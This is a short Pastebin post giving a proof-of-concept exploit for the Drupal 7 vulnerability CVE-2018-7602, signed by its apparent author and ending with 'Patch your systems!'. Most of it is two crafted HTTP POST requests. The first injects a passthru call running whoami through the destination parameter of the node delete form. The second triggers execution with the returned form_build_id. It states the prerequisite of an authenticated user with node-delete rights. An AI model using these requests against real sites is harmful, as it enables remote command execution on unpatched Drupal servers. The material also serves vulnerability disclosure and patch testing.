daily pastebin goal
82%
SHARE
TWEET

Drupal 7 exploit

a guest Apr 25th, 2018 9,817 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
  2.  
  3. You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
  4.  
  5. POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
  6. [...]
  7. form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
  8.  
  9. Retrieve the form_build_id from the response, and then triggering the exploit with :
  10.  
  11. POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
  12. [...]
  13. form_build_id=[FORM_BUILD_ID]
  14.  
  15. This will display the result of the whoami command.
  16.  
  17. Patch your systems!
  18. Blaklis
RAW Paste Data
Top